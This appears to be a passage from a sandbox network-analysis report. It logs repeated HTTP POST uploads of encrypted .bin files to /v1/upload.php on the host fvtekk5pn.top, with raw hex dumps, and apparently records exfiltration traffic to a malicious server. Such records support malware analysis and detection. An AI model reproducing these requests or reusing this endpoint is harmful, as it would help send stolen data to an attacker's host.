Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63867Content-Type: multipart/form-data; boundary=------------------------8kQXZUrNXOoyZ27swMPHfuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6b 51 58 5a 55 72 4e 58 4f 6f 79 5a 32 37 73 77 4d 50 48 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 75 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 5d 6a f6 b8 c2 be 6c 20 32 3d 80 8b a2 45 40 50 52 a2 03 2d 9a 8a 68 b7 09 c3 ad fa 2d 9e 6b cd a6 76 eb 3d 5c bb d0 ae e7 3c f0 c1 9a ae 99 20 05 19 25 80 d4 38 96 df 76 e2 e0 f9 7f 6c f0 d0 3e e7 a8 fb 57 bf 4f 9e d9 f2 e9 30 af c8 14 1c da 53 09 16 50 30 71 11 cf a4 e7 c2 8f e9 2f b5 d9 49 34 00 16 52 e7 ce 3b de e7 33 a4 90 a8 4a 6c 45 dc 3b 47 e0 7e fb 17 e6 71 e8 8d 59 0c 1c 3b 56 34 56 34 5d 1b ca 18 e8 b4 9e d1 5c 54 20 86 43 36 fe d4 4b e2 9b 67 d6 85 0f ed 2f 7a c8 2c c4 5f 94 44 d4 9c 86 71 3b ee 22 a7 e1 af 47 be cf dc fc 13 bd e0 89 9d e4 c1 f1 63 94 12 00 b7 96 56 fc e5 5f fd 5d f2 e4 fc fa b8 4b 8d 9e 54 6f 7b b7 cd 7a 15 47 77 59 af 98 ab e9 6c 8a 7a 4b 6a 70 18 a3 cc 41 3b 15 a6 5e ea 9f ac 1c c1 10 1c 00 b5 67 4f 51 7b 3a b5 d8 79 85 91 86 7a ce 22 23 72 22 3a 3d 00 66 22 97 9d d0 6f d4 16 8a 8a 36 9a b8 b3 2d 0a bd 51 eb fb b7 69 e0 ec d1 51 47 89 4a 36 60 23 d8 31 42 5b 1f 0f f7 7e 37 56 b2 d9 73 21 8f 2c 68 5b 36 62 01 be 61 56 cc a5 d7 51 de 17 0f 5f 3b 7b c0 a2 a5 51 c4 28 bf d1 06 41 14 97 e3 41 6d cf 71 cb 73 99 4f 66 5e 8f df 29 1e 3f 6a 19 9e fb ff 27 51 10 12 db 15 b7 1f ab e0 1e 5d ee d9 5e a5 63 46 3d 46 72 59 12 87 47 64 f7 b7 f1 e8 88 58 9d 16 b0 83 87 e1 51 8d c1 b0 82 cb c9 88 10 f7 d2 76 b6 7d 18 a8 a6 44 ed 3c 6c a2 a1 25 96 37 eb c8 5b fa e3 bc 95 bf bb 60 a4 4b 0c ee 59 2c 87 2d 6d 14 4e 4a f4 28 d9 fd 97 13 3f 35 ae 5c 38 22 72 de 9e 39 3c 45 cb da 29 30 fe 15 48 9b 27 0c 2b 7e c8 5f d9 6d c6 d3 c4 66 07 d6 16 55 75 25 22 f7 36 ab 4e 3b eb 88 d5 0c 4e 07 66 ea fd 2e ee 03 19 cf d3 84 bd 6e 37 d3 ef 03 26 8d 90 2b 64 57 eb 90 bf 20 b0 e7 34 5f ff cf d7 4b 53 66 ae df e3 16 f4 fe ca 0d 23 d4 23 48 e6 89 9d c3 be 99 fd 2b d8 30 85 a0 35 51 46 8a 45 0b d2 e5 ca 3c d5 2e 1b 78 98 2a e0 c1 1a f7 cb 90 36 56 92 09 6e f2 de 92 81 92 df d1 0a f3 57 f9 10 cc b4 7f a9 50 39 79 ef 38 fa f2 88 c4 cc cb 56 21 21 98 87 26 75 ca af b5 69 b1 9f 2b 5d 64 b6 fd b0 87 2f 98 9c 38 33 1d b2 36 37 ef 00 21 13 8b d0 9f 2b ef 87 75 6d 40 70 ce cc 73 ae c6 40 7a 49 62 57 ce fb d9 65 e5 ee 8c e7 e2 68 bd 34 a8 8c 20 c9 5d 5c 3e 6b 84 95 fb 24 4f 71 e1 30 3a 22 d7 59 62 9a 32 61 6d da df 98 c5 05 65 c6 89 e6 2f 37 a2 fe 3e 1d fb 53 b6 17 ce 10 74 88 3d 2c 4b 98 6b 47 ae 1c d5 08 1c 48 a9 df 26 98 5d 29 8e 1c 67 ef 8b d0 a9 d2 8f cb 6a dd 40 9a c8 94 af 30 36 25 34 6d 3f ba
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63867Content-Type: multipart/form-data; boundary=------------------------8kQXZUrNXOoyZ27swMPHfuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6b 51 58 5a 55 72 4e 58 4f 6f 79 5a 32 37 73 77 4d 50 48 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 75 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 5d 6a f6 b8 c2 be 6c 20 32 3d 80 8b a2 45 40 50 52 a2 03 2d 9a 8a 68 b7 09 c3 ad fa 2d 9e 6b cd a6 76 eb 3d 5c bb d0 ae e7 3c f0 c1 9a ae 99 20 05 19 25 80 d4 38 96 df 76 e2 e0 f9 7f 6c f0 d0 3e e7 a8 fb 57 bf 4f 9e d9 f2 e9 30 af c8 14 1c da 53 09 16 50 30 71 11 cf a4 e7 c2 8f e9 2f b5 d9 49 34 00 16 52 e7 ce 3b de e7 33 a4 90 a8 4a 6c 45 dc 3b 47 e0 7e fb 17 e6 71 e8 8d 59 0c 1c 3b 56 34 56 34 5d 1b ca 18 e8 b4 9e d1 5c 54 20 86 43 36 fe d4 4b e2 9b 67 d6 85 0f ed 2f 7a c8 2c c4 5f 94 44 d4 9c 86 71 3b ee 22 a7 e1 af 47 be cf dc fc 13 bd e0 89 9d e4 c1 f1 63 94 12 00 b7 96 56 fc e5 5f fd 5d f2 e4 fc fa b8 4b 8d 9e 54 6f 7b b7 cd 7a 15 47 77 59 af 98 ab e9 6c 8a 7a 4b 6a 70 18 a3 cc 41 3b 15 a6 5e ea 9f ac 1c c1 10 1c 00 b5 67 4f 51 7b 3a b5 d8 79 85 91 86 7a ce 22 23 72 22 3a 3d 00 66 22 97 9d d0 6f d4 16 8a 8a 36 9a b8 b3 2d 0a bd 51 eb fb b7 69 e0 ec d1 51 47 89 4a 36 60 23 d8 31 42 5b 1f 0f f7 7e 37 56 b2 d9 73 21 8f 2c 68 5b 36 62 01 be 61 56 cc a5 d7 51 de 17 0f 5f 3b 7b c0 a2 a5 51 c4 28 bf d1 06 41 14 97 e3 41 6d cf 71 cb 73 99 4f 66 5e 8f df 29 1e 3f 6a 19 9e fb ff 27 51 10 12 db 15 b7 1f ab e0 1e 5d ee d9 5e a5 63 46 3d 46 72 59 12 87 47 64 f7 b7 f1 e8 88 58 9d 16 b0 83 87 e1 51 8d c1 b0 82 cb c9 88 10 f7 d2 76 b6 7d 18 a8 a6 44 ed 3c 6c a2 a1 25 96 37 eb c8 5b fa e3 bc 95 bf bb 60 a4 4b 0c ee 59 2c 87 2d 6d 14 4e 4a f4 28 d9 fd 97 13 3f 35 ae 5c 38 22 72 de 9e 39 3c 45 cb da 29 30 fe 15 48 9b 27 0c 2b 7e c8 5f d9 6d c6 d3 c4 66 07 d6 16 55 75 25 22 f7 36 ab 4e 3b eb 88 d5 0c 4e 07 66 ea fd 2e ee 03 19 cf d3 84 bd 6e 37 d3 ef 03 26 8d 90 2b 64 57 eb 90 bf 20 b0 e7 34 5f ff cf d7 4b 53 66 ae df e3 16 f4 fe ca 0d 23 d4 23 48 e6 89 9d c3 be 99 fd 2b d8 30 85 a0 35 51 46 8a 45 0b d2 e5 ca 3c d5 2e 1b 78 98 2a e0 c1 1a f7 cb 90 36 56 92 09 6e f2 de 92 81 92 df d1 0a f3 57 f9 10 cc b4 7f a9 50 39 79 ef 38 fa f2 88 c4 cc cb 56 21 21 98 87 26 75 ca af b5 69 b1 9f 2b 5d 64 b6 fd b0 87 2f 98 9c 38 33 1d b2 36 37 ef 00 21 13 8b d0 9f 2b ef 87 75 6d 40 70 ce cc 73 ae c6 40 7a 49 62 57 ce fb d9 65 e5 ee 8c e7 e2 68 bd 34 a8 8c 20 c9 5d 5c 3e 6b 84 95 fb 24 4f 71 e1 30 3a 22 d7 59 62 9a 32 61 6d da df 98 c5 05 65 c6 89 e6 2f 37 a2 fe 3e 1d fb 53 b6 17 ce 10 74 88 3d 2c 4b 98 6b 47 ae 1c d5 08 1c 48 a9 df 26 98 5d 29 8e 1c 67 ef 8b d0 a9 d2 8f cb 6a dd 40 9a c8 94 af 30 36 25 34 6d 3f ba
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63867Content-Type: multipart/form-data; boundary=------------------------8kQXZUrNXOoyZ27swMPHfuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6b 51 58 5a 55 72 4e 58 4f 6f 79 5a 32 37 73 77 4d 50 48 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 75 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 5d 6a f6 b8 c2 be 6c 20 32 3d 80 8b a2 45 40 50 52 a2 03 2d 9a 8a 68 b7 09 c3 ad fa 2d 9e 6b cd a6 76 eb 3d 5c bb d0 ae e7 3c f0 c1 9a ae 99 20 05 19 25 80 d4 38 96 df 76 e2 e0 f9 7f 6c f0 d0 3e e7 a8 fb 57 bf 4f 9e d9 f2 e9 30 af c8 14 1c da 53 09 16 50 30 71 11 cf a4 e7 c2 8f e9 2f b5 d9 49 34 00 16 52 e7 ce 3b de e7 33 a4 90 a8 4a 6c 45 dc 3b 47 e0 7e fb 17 e6 71 e8 8d 59 0c 1c 3b 56 34 56 34 5d 1b ca 18 e8 b4 9e d1 5c 54 20 86 43 36 fe d4 4b e2 9b 67 d6 85 0f ed 2f 7a c8 2c c4 5f 94 44 d4 9c 86 71 3b ee 22 a7 e1 af 47 be cf dc fc 13 bd e0 89 9d e4 c1 f1 63 94 12 00 b7 96 56 fc e5 5f fd 5d f2 e4 fc fa b8 4b 8d 9e 54 6f 7b b7 cd 7a 15 47 77 59 af 98 ab e9 6c 8a 7a 4b 6a 70 18 a3 cc 41 3b 15 a6 5e ea 9f ac 1c c1 10 1c 00 b5 67 4f 51 7b 3a b5 d8 79 85 91 86 7a ce 22 23 72 22 3a 3d 00 66 22 97 9d d0 6f d4 16 8a 8a 36 9a b8 b3 2d 0a bd 51 eb fb b7 69 e0 ec d1 51 47 89 4a 36 60 23 d8 31 42 5b 1f 0f f7 7e 37 56 b2 d9 73 21 8f 2c 68 5b 36 62 01 be 61 56 cc a5 d7 51 de 17 0f 5f 3b 7b c0 a2 a5 51 c4 28 bf d1 06 41 14 97 e3 41 6d cf 71 cb 73 99 4f 66 5e 8f df 29 1e 3f 6a 19 9e fb ff 27 51 10 12 db 15 b7 1f ab e0 1e 5d ee d9 5e a5 63 46 3d 46 72 59 12 87 47 64 f7 b7 f1 e8 88 58 9d 16 b0 83 87 e1 51 8d c1 b0 82 cb c9 88 10 f7 d2 76 b6 7d 18 a8 a6 44 ed 3c 6c a2 a1 25 96 37 eb c8 5b fa e3 bc 95 bf bb 60 a4 4b 0c ee 59 2c 87 2d 6d 14 4e 4a f4 28 d9 fd 97 13 3f 35 ae 5c 38 22 72 de 9e 39 3c 45 cb da 29 30 fe 15 48 9b 27 0c 2b 7e c8 5f d9 6d c6 d3 c4 66 07 d6 16 55 75 25 22 f7 36 ab 4e 3b eb 88 d5 0c 4e 07 66 ea fd 2e ee 03 19 cf d3 84 bd 6e 37 d3 ef 03 26 8d 90 2b 64 57 eb 90 bf 20 b0 e7 34 5f ff cf d7 4b 53 66 ae df e3 16 f4 fe ca 0d 23 d4 23 48 e6 89 9d c3 be 99 fd 2b d8 30 85 a0 35 51 46 8a 45 0b d2 e5 ca 3c d5 2e 1b 78 98 2a e0 c1 1a f7 cb 90 36 56 92 09 6e f2 de 92 81 92 df d1 0a f3 57 f9 10 cc b4 7f a9 50 39 79 ef 38 fa f2 88 c4 cc cb 56 21 21 98 87 26 75 ca af b5 69 b1 9f 2b 5d 64 b6 fd b0 87 2f 98 9c 38 33 1d b2 36 37 ef 00 21 13 8b d0 9f 2b ef 87 75 6d 40 70 ce cc 73 ae c6 40 7a 49 62 57 ce fb d9 65 e5 ee 8c e7 e2 68 bd 34 a8 8c 20 c9 5d 5c 3e 6b 84 95 fb 24 4f 71 e1 30 3a 22 d7 59 62 9a 32 61 6d da df 98 c5 05 65 c6 89 e6 2f 37 a2 fe 3e 1d fb 53 b6 17 ce 10 74 88 3d 2c 4b 98 6b 47 ae 1c d5 08 1c 48 a9 df 26 98 5d 29 8e 1c 67 ef 8b d0 a9 d2 8f cb 6a dd 40 9a c8 94 af 30 36 25 34 6d 3f ba
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63867Content-Type: multipart/form-data; boundary=------------------------8kQXZUrNXOoyZ27swMPHfuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6b 51 58 5a 55 72 4e 58 4f 6f 79 5a 32 37 73 77 4d 50 48 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 75 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 5d 6a f6 b8 c2 be 6c 20 32 3d 80 8b a2 45 40 50 52 a2 03 2d 9a 8a 68 b7 09 c3 ad fa 2d 9e 6b cd a6 76 eb 3d 5c bb d0 ae e7 3c f0 c1 9a ae 99 20 05 19 25 80 d4 38 96 df 76 e2 e0 f9 7f 6c f0 d0 3e e7 a8 fb 57 bf 4f 9e d9 f2 e9 30 af c8 14 1c da 53 09 16 50 30 71 11 cf a4 e7 c2 8f e9 2f b5 d9 49 34 00 16 52 e7 ce 3b de e7 33 a4 90 a8 4a 6c 45 dc 3b 47 e0 7e fb 17 e6 71 e8 8d 59 0c 1c 3b 56 34 56 34 5d 1b ca 18 e8 b4 9e d1 5c 54 20 86 43 36 fe d4 4b e2 9b 67 d6 85 0f ed 2f 7a c8 2c c4 5f 94 44 d4 9c 86 71 3b ee 22 a7 e1 af 47 be cf dc fc 13 bd e0 89 9d e4 c1 f1 63 94 12 00 b7 96 56 fc e5 5f fd 5d f2 e4 fc fa b8 4b 8d 9e 54 6f 7b b7 cd 7a 15 47 77 59 af 98 ab e9 6c 8a 7a 4b 6a 70 18 a3 cc 41 3b 15 a6 5e ea 9f ac 1c c1 10 1c 00 b5 67 4f 51 7b 3a b5 d8 79 85 91 86 7a ce 22 23 72 22 3a 3d 00 66 22 97 9d d0 6f d4 16 8a 8a 36 9a b8 b3 2d 0a bd 51 eb fb b7 69 e0 ec d1 51 47 89 4a 36 60 23 d8 31 42 5b 1f 0f f7 7e 37 56 b2 d9 73 21 8f 2c 68 5b 36 62 01 be 61 56 cc a5 d7 51 de 17 0f 5f 3b 7b c0 a2 a5 51 c4 28 bf d1 06 41 14 97 e3 41 6d cf 71 cb 73 99 4f 66 5e 8f df 29 1e 3f 6a 19 9e fb ff 27 51 10 12 db 15 b7 1f ab e0 1e 5d ee d9 5e a5 63 46 3d 46 72 59 12 87 47 64 f7 b7 f1 e8 88 58 9d 16 b0 83 87 e1 51 8d c1 b0 82 cb c9 88 10 f7 d2 76 b6 7d 18 a8 a6 44 ed 3c 6c a2 a1 25 96 37 eb c8 5b fa e3 bc 95 bf bb 60 a4 4b 0c ee 59 2c 87 2d 6d 14 4e 4a f4 28 d9 fd 97 13 3f 35 ae 5c 38 22 72 de 9e 39 3c 45 cb da 29 30 fe 15 48 9b 27 0c 2b 7e c8 5f d9 6d c6 d3 c4 66 07 d6 16 55 75 25 22 f7 36 ab 4e 3b eb 88 d5 0c 4e 07 66 ea fd 2e ee 03 19 cf d3 84 bd 6e 37 d3 ef 03 26 8d 90 2b 64 57 eb 90 bf 20 b0 e7 34 5f ff cf d7 4b 53 66 ae df e3 16 f4 fe ca 0d 23 d4 23 48 e6 89 9d c3 be 99 fd 2b d8 30 85 a0 35 51 46 8a 45 0b d2 e5 ca 3c d5 2e 1b 78 98 2a e0 c1 1a f7 cb 90 36 56 92 09 6e f2 de 92 81 92 df d1 0a f3 57 f9 10 cc b4 7f a9 50 39 79 ef 38 fa f2 88 c4 cc cb 56 21 21 98 87 26 75 ca af b5 69 b1 9f 2b 5d 64 b6 fd b0 87 2f 98 9c 38 33 1d b2 36 37 ef 00 21 13 8b d0 9f 2b ef 87 75 6d 40 70 ce cc 73 ae c6 40 7a 49 62 57 ce fb d9 65 e5 ee 8c e7 e2 68 bd 34 a8 8c 20 c9 5d 5c 3e 6b 84 95 fb 24 4f 71 e1 30 3a 22 d7 59 62 9a 32 61 6d da df 98 c5 05 65 c6 89 e6 2f 37 a2 fe 3e 1d fb 53 b6 17 ce 10 74 88 3d 2c 4b 98 6b 47 ae 1c d5 08 1c 48 a9 df 26 98 5d 29 8e 1c 67 ef 8b d0 a9 d2 8f cb 6a dd 40 9a c8 94 af 30 36 25 34 6d 3f ba
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63867Content-Type: multipart/form-data; boundary=------------------------8kQXZUrNXOoyZ27swMPHfuData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 6b 51 58 5a 55 72 4e 58 4f 6f 79 5a 32 37 73 77 4d 50 48 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 7a 75 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 23 5d 6a f6 b8 c2 be 6c 20 32 3d 80 8b a2 45 40 50 52 a2 03 2d 9a 8a 68 b7 09 c3 ad fa 2d 9e 6b cd a6 76 eb 3d 5c bb d0 ae e7 3c f0 c1 9a ae 99 20 05 19 25 80 d4 38 96 df 76 e2 e0 f9 7f 6c f0 d0 3e e7 a8 fb 57 bf 4f 9e d9 f2 e9 30 af c8 14 1c da 53 09 16 50 30 71 11 cf a4 e7 c2 8f e9 2f b5 d9 49 34 00 16 52 e7 ce 3b de e7 33 a4 90 a8 4a 6c 45 dc 3b 47 e0 7e fb 17 e6 71 e8 8d 59 0c 1c 3b 56 34 56 34 5d 1b ca 18 e8 b4 9e d1 5c 54 20 86 43 36 fe d4 4b e2 9b 67 d6 85 0f ed 2f 7a c8 2c c4 5f 94 44 d4 9c 86 71 3b ee 22 a7 e1 af 47 be cf dc fc 13 bd e0 89 9d e4 c1 f1 63 94 12 00 b7 96 56 fc e5 5f fd 5d f2 e4 fc fa b8 4b 8d 9e 54 6f 7b b7 cd 7a 15 47 77 59 af 98 ab e9 6c 8a 7a 4b 6a 70 18 a3 cc 41 3b 15 a6 5e ea 9f ac 1c c1 10 1c 00 b5 67 4f 51 7b 3a b5 d8 79 85 91 86 7a ce 22 23 72 22 3a 3d 00 66 22 97 9d d0 6f d4 16 8a 8a 36 9a b8 b3 2d 0a bd 51 eb fb b7 69 e0 ec d1 51 47 89 4a 36 60 23 d8 31 42 5b 1f 0f f7 7e 37 56 b2 d9 73 21 8f 2c 68 5b 36 62 01 be 61 56 cc a5 d7 51 de 17 0f 5f 3b 7b c0 a2 a5 51 c4 28 bf d1 06 41 14 97 e3 41 6d cf 71 cb 73 99 4f 66 5e 8f df 29 1e 3f 6a 19 9e fb ff 27 51 10 12 db 15 b7 1f ab e0 1e 5d ee d9 5e a5 63 46 3d 46 72 59 12 87 47 64 f7 b7 f1 e8 88 58 9d 16 b0 83 87 e1 51 8d c1 b0 82 cb c9 88 10 f7 d2 76 b6 7d 18 a8 a6 44 ed 3c 6c a2 a1 25 96 37 eb c8 5b fa e3 bc 95 bf bb 60 a4 4b 0c ee 59 2c 87 2d 6d 14 4e 4a f4 28 d9 fd 97 13 3f 35 ae 5c 38 22 72 de 9e 39 3c 45 cb da 29 30 fe 15 48 9b 27 0c 2b 7e c8 5f d9 6d c6 d3 c4 66 07 d6 16 55 75 25 22 f7 36 ab 4e 3b eb 88 d5 0c 4e 07 66 ea fd 2e ee 03 19 cf d3 84 bd 6e 37 d3 ef 03 26 8d 90 2b 64 57 eb 90 bf 20 b0 e7 34 5f ff cf d7 4b 53 66 ae df e3 16 f4 fe ca 0d 23 d4 23 48 e6 89 9d c3 be 99 fd 2b d8 30 85 a0 35 51 46 8a 45 0b d2 e5 ca 3c d5 2e 1b 78 98 2a e0 c1 1a f7 cb 90 36 56 92 09 6e f2 de 92 81 92 df d1 0a f3 57 f9 10 cc b4 7f a9 50 39 79 ef 38 fa f2 88 c4 cc cb 56 21 21 98 87 26 75 ca af b5 69 b1 9f 2b 5d 64 b6 fd b0 87 2f 98 9c 38 33 1d b2 36 37 ef 00 21 13 8b d0 9f 2b ef 87 75 6d 40 70 ce cc 73 ae c6 40 7a 49 62 57 ce fb d9 65 e5 ee 8c e7 e2 68 bd 34 a8 8c 20 c9 5d 5c 3e 6b 84 95 fb 24 4f 71 e1 30 3a 22 d7 59 62 9a 32 61 6d da df 98 c5 05 65 c6 89 e6 2f 37 a2 fe 3e 1d fb 53 b6 17 ce 10 74 88 3d 2c 4b 98 6b 47 ae 1c d5 08 1c 48 a9 df 26 98 5d 29 8e 1c 67 ef 8b d0 a9 d2 8f cb 6a dd 40 9a c8 94 af 30 36 25 34 6d 3f ba
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27815Content-Type: multipart/form-data; boundary=------------------------FyuPCKo31SNkXFO1Pv2dWhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 79 75 50 43 4b 6f 33 31 53 4e 6b 58 46 4f 31 50 76 32 64 57 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 6e 65 64 61 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b a5 8c 6c 6d e2 74 41 7a 37 8c dc 47 9f 34 7d 75 0f 38 5e 14 77 13 ba c6 7e 15 79 38 b4 da 15 b6 8e 56 69 4c b3 81 80 33 14 0c 91 a9 38 26 f1 e0 ce 8f f4 52 29 b5 a0 97 6c d2 68 ed 69 0b 2c 99 9e ae 22 9a eb e4 31 ac d4 80 8d 4c 4e f0 55 ed 10 80 d1 e6 ee 3a 89 0c c2 8c 9a b4 9d 1c 7d 3a 6a 66 dc 94 df e4 3c fc 91 5a 6b 1c d7 66 95 61 8c 9b 99 70 5b 73 44 af 46 21 c2 de 92 a2 8b 10 02 9f c0 4b 95 24 d4 66 f5 a6 d4 68 59 f4 9a 8d ee 2b 4a 25 1b d5 98 7d 54 db 88 e6 84 2d 4b b8 e5 35 5a c9 0a 8c bc b0 42 b7 3b c7 f1 5b 87 d9 a3 a0 1c 64 7b 67 8e 87 28 88 98 1a 86 db 56 db 7f 3b 77 db 10 7b 1c 08 17 48 0c ab 9c cc b9 8d e0 c0 5c bf 93 a5 43 8d b6 13 3a 03 d7 6b bf 9b e2 59 bc ab 15 04 ab 4e 96 4e 71 42 ca ee 1c 4f ce ad 41 a9 71 00 68 f4 09 c5 cd b5 39 f5 47 50 e6 fe 56 d7 0b e5 a6 3f 8a 98 02 4f 21 8d 61 cc 46 1d df e8 e5 e7 09 9d b5 f6 a0 77 89 21 ee 19 93 de f9 35 a2 13 e4 b6 35 15 05 2b 59 04 f8 92 00 5a ff 2e 9c 6a fb 43 b4 89 b3 25 9b 20 56 6b fd a7 f2 45 e9 1c 5a 6c e4 9b df 6a 84 e7 5f a5 a8 11 5f 2a 34 bd f6 c7 4e c9 e9 00 20 69 44 e9 2b a8 95 34 8f 88 9d a5 8c c6 6f f0 58 35 ba 4b 08 1d 17 69 f3 88 15 7b 11 7e b6 b3 38 f1 df 32 5b 90 ca f1 11 7a c3 33 92 f6 e1 40 90 af ba b6 23 ea 8f 92 19 a3 07 1e 62 d1 4d 71 7c ec 6a 4e 31 86 17 a4 1c 6f 40 41 b4 1f f0 c9 31 f7 b4 92 ee 3e d6 0c f0 d0 c6 16 60 4a 36 b9 35 3a 5b ee d4 dc 7c 13 eb c0 80 67 12 20 a7 86 63 03 43 50 65 6b 30 f6 67 30 f6 53 f9 54 3e c2 11 d7 85 f8 21 37 d7 a7 34 83 c3 1b c0 ed 93 f3 31 fe 13 d9 3f dc 8b 9b 3c 9e 3a 72 ad 67 71 91 5d c9 2a 91 4e ca 16 2e cd 8f e8 96 21 48 c6 7e 36 74 c2 27 1c 4a c1 c3 2f d1 54 91 3b 34 44 21 9d 68 59 a0 87 fc 9d 08 30 72 b9 7e e4 da 93 2f 06 37 69 d8 75 b8 3c 21 b8 be d5 10 2c 5d 27 a0 98 83 5c 7a b3 88 52 5c ba 8f 18 8b ae 11 c9 09 54 cb 02 14 52 49 3a e1 54 4f 43 d8 3a 01 a0 d3 55 ad 59 67 24 3c df a0 47 c5 fc fb 87 b2 cf b0 39 12 24 2c 86 e3 dc df bf 42 bc d7 38 e7 15 e0 fb f7 64 77 c4 6c c5 73 00 8a 50 db bb aa 9b 4d 97 da b5 1a c0 84 fe c4 c8 c3 14 ad ea 92 2e ac 52 df 64 41 44 5d 59 31 7b 5c 92 73 b3 3f 4a 0a b1 4f 64 43 f1 10 cd b1 d4 b4 1a 24 03 f1 67 37 7d 59 ea d0 9f 4a e4 00 a5 91 7d 1f c4 8e 13 47 b0 48 db 13 90 a2 6e df eb 7e 42 30 71 1a 30 0b 34 e8 06 93 f3 5d 35 42 02 cc 2d 10 1b b2 1f 9b 34 38 7f 9b cd db 83 03 a3 b6 38 ef 7c ee e5 7f 0b 6b 63 b4 fc dd 51 31 dd 34 9c
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27815Content-Type: multipart/form-data; boundary=------------------------FyuPCKo31SNkXFO1Pv2dWhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 79 75 50 43 4b 6f 33 31 53 4e 6b 58 46 4f 31 50 76 32 64 57 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 6e 65 64 61 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b a5 8c 6c 6d e2 74 41 7a 37 8c dc 47 9f 34 7d 75 0f 38 5e 14 77 13 ba c6 7e 15 79 38 b4 da 15 b6 8e 56 69 4c b3 81 80 33 14 